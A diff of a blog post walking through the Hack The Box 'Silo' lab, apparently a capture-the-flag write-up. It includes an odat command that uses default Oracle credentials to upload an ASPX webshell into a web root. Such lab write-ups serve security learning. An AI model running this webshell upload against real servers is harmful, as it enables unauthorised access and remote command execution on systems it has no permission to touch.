1n4r1/1n4r1.github.io/_posts/2019-11-07-Hackthebox-Silo-Walkthrough.md

 Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production

 SQL>
-*{% endhighlight %}
+{% endhighlight %}

 For the Oracle penetration testing, we can use a script "<a href="https://github.com/quentinhardy/odat">odat.py</a>".<br>
 It is not installed by default, we have to install with "apt-get"<br>
-Then, upload a aspx webshell which is installed on Kali linux by default.
+Then, upload a aspx webshell which is installed on Kali linux by default.<br>
+To upload a file, we need an option "dbmsadvisor".
 {% highlight shell %}
 root@kali:~# odat dbmsadvisor -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --putFile C:\\inetpub\\wwwroot cmdasp.aspx /usr/share/webshells/aspx/cmdasp.aspx